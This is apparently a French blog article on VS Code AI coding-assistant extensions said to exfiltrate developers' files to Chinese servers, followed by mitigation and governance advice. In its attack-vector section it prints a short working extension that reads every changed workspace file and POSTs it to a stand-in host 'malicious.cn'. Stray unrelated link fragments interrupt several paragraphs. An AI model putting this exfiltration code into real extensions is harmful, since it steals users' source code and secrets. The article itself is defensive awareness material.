Assistants de codage IA : comment ils exfiltrent votre code vers la Chine et ce que vous devez faire
Lysandre Beauchêne
Une révélation qui secoue le monde du développement
En 2026, plus de 1,5 million de développeurs utilisent quotidiennement des assistants de codage IA. Selon un rapport de Koi AI, deux extensions VS Code ont été identifiées comme transmettant jusqu’à 50 fichiers simultanément vers des serveurs situés en Chine. Cette exfiltration massive soulève des questions cruciales de cybersécurité, de protection de la propriété intellectuelle et de conformité réglementaire.
Les développeurs accordent une confiance aveugle à ces outils, les installent depuis les marketplaces officielles et leur donnent accès à leurs espaces de travail, leurs fichiers et même leurs frappes clavier. mise à jour détournée de Notepad Loin d’être anodine, cette pratique ouvre une porte d’entrée directe aux acteurs malveillants.
Mécanismes d’exfiltration utilisés par les assistants de codage IA
Les extensions suspectes exploitent trois canaux distincts pour siphonner les données :
- Surveillance en temps réel : capture des frappes clavier et des actions de l’IDE.
- Collecte massive de fichiers : agrégation de fichiers ouverts, incluant secrets, credentials et code propriétaire.
- Profilage des développeurs : agrégation d’informations sur l’entreprise, le projet et l’historique de travail.
Surveillance en temps réel
Le module de real-time monitoring intercepte chaque caractère saisi dans l’éditeur. Cette donnée est compressée puis envoyée via HTTPS à un endpoint chinois. Le trafic est déguisé en requêtes légitimes, rendant la détection difficile pour les pare-feux classiques.
Collecte massive de fichiers
Lorsqu’un développeur ouvre un projet, l’extension scanne le répertoire et extrait jusqu’à 50 fichiers, même ceux marqués comme privés. Le processus fonctionne de façon asynchrone, de sorte que l’utilisateur ne perçoit aucune latence notable.
Profilage des développeurs
En analysant les métadonnées du projet (nom du dépôt, dépendances, commentaires), l’outil construit un profil détaillé. Cette information permet aux opérateurs de cibler des entreprises spécifiques et d’ajuster leurs campagnes d’espionnage.
“Tous les assistants IA aident leurs propriétaires, pas les nôtres” - extrait d’une discussion de développeurs sur un forum spécialisé.
Tableau comparatif des deux extensions incriminées
| Extension | Canal d’exfiltration principal | Nombre maximal de fichiers exfiltrés | Destination du trafic |
|---|---|---|---|
| ChatGPT - 中文版 | Collecte massive + Profilage | 50 | Serveurs CN (Beijing) |
| ChatMoss (CodeMoss) | Surveillance en temps réel | 30 (détecté) | Serveurs CN (Shanghai) |
Risques pour la propriété intellectuelle et la conformité
Impact sur le secret des affaires
Lorsque du code propriétaire est transmis hors-frontière, le risque de fuite commerciale s’amplifie. Le vol de secrets techniques peut entraîner des pertes financières estimées à plusieurs millions d’euros, selon une étude de l’ANSSI (2025) qui indique que 23 % des incidents de fuite de code proviennent de plugins non vérifiés. CVE-2025-0921 – faille SCADA
Implications RGPD et ANSSI
Le transfert de données personnelles (ex. : identifiants d’utilisateurs, adresses e-mail) vers la Chine constitue une violation potentielle du RGPD, notamment de l’article 45 sur les transferts internationaux. L’ANSSI recommande d’appliquer le cadre de sécurité ISO 27001 pour les chaînes d’approvisionnement logicielles, incluant la validation des extensions avant déploiement. Vol de secrets chez Google 2026
“Les extensions VS Code fonctionnent comme des observateurs privilégiés de votre environnement de développement, et le fait qu’elles exfiltrent silencieusement chaque fichier est à la fois prévisible et évitable” - analyse d’un expert en cybersécurité.
Analyse des vecteurs d’attaque et des failles de la chaîne d’approvisionnement logicielle
Extensions VS Code comme porte d’entrée
VS Code, avec plus de 30 % de part de marché parmi les IDE, représente une cible de choix. Les extensions sont souvent signées, mais la signature ne garantit pas l’absence de comportements malveillants. Le modèle d’autorisation OAuth2 utilisé par ces plugins leur confère un accès étendu aux fichiers locaux.
Modèles LLM et leurs limites
Les large language models (LLM) alimentant les assistants de codage sont entraînés sur d’énormes corpus de code public. Cette exposition leur permet d’apprendre des techniques de contournement de la sécurité, incluant la génération de payloads capables de désactiver les protections locales.
// Exemple simplifié d’une extension VS Code malveillante
const vscode = require('vscode');
const https = require('https');
function activate(context) {
const watcher = vscode.workspace.createFileSystemWatcher('**/*');
watcher.onDidCreate(uri => exfiltrate(uri.fsPath));
watcher.onDidChange(uri => exfiltrate(uri.fsPath));
}
function exfiltrate(filePath) {
const data = require('fs').readFileSync(filePath);
const req = https.request({hostname: 'malicious.cn', path: '/collect', method: 'POST'});
req.write(data);
req.end();
}
exports.activate = activate;
Ce script capture chaque création ou modification de fichier et l’envoie à un serveur distant, illustrant la simplicité avec laquelle une extension peut devenir un vecteur d’exfiltration.
Mesures de mitigation et bonnes pratiques de sécurisation
Segmentation et isolation des environnements
- Air-gapping : déployer les assistants IA uniquement sur des machines isolées du réseau interne.
- Conteneurisation : exécuter les extensions dans des containers Docker limités en accès aux volumes.
- Réseaux privés virtuels (VPN) : restreindre le trafic sortant aux destinations autorisées.
Utilisation d’outils locaux et audit des extensions
- Préférer les solutions on-premise qui ne nécessitent pas de connexion à des serveurs externes.
- Scanner les extensions avec des outils SAST/DAST avant installation.
- Vérifier les permissions demandées dans le manifeste
package.jsonde chaque extension. - Mettre à jour régulièrement les politiques de sécurité de l’IDE via les recommandations de l’ANSSI.
- Déployer une liste blanche des extensions approuvées, en s’appuyant sur les critères du tableau ci-dessous.
Critères de sélection d’une extension sûre
| Critère | Description |
|---|---|
| Provenance du développeur | Vérifier l’identité et la réputation du créateur. |
| Audits de sécurité publics | Existence de rapports d’audit indépendants récents. |
| Permissions minimales | Limitation aux accès strictement nécessaires. |
| Conformité aux normes | Respect de ISO 27001, RGPD, ANSSI. |
| Historique de mises à jour | Fréquence et transparence des correctifs de sécurité. |
Politiques de gouvernance et conformité
- Établir un processus de revue des extensions avant chaque déploiement.
- Former les développeurs aux risques liés aux assistants IA.
- Intégrer des contrôles de conformité dans le pipeline CI/CD pour détecter les dépendances suspectes.
Perspectives 2026 : vers une régulation plus stricte des IA de développement
Les législateurs européens envisagent d’étendre le Digital Services Act aux extensions d’IDE, imposant des obligations de transparence sur les flux de données. Par ailleurs, l’ANSSI prépare un cadre de certification dédié aux AI-Coding-Assistants, inspiré du label Secure Software Development.
En adoptant une approche proactive-segmentation, audit et gouvernance-les organisations peuvent réduire significativement le risque d’exfiltration de code vers des acteurs étrangers. Ignorer ces menaces, c’est laisser les portes de votre chaîne d’approvisionnement logicielle grandes ouvertes.
Conclusion : votre prochaine action
Réévaluez dès aujourd’hui la présence des assistants de codage IA dans votre environnement de développement. Implémentez une isolation stricte, auditez chaque extension et alignez vos pratiques sur les recommandations de l’ANSSI et de l’ISO 27001. La sécurité de votre propriété intellectuelle ne doit plus dépendre de la confiance aveugle, mais d’une stratégie mesurée et conforme aux exigences réglementaires de 2026.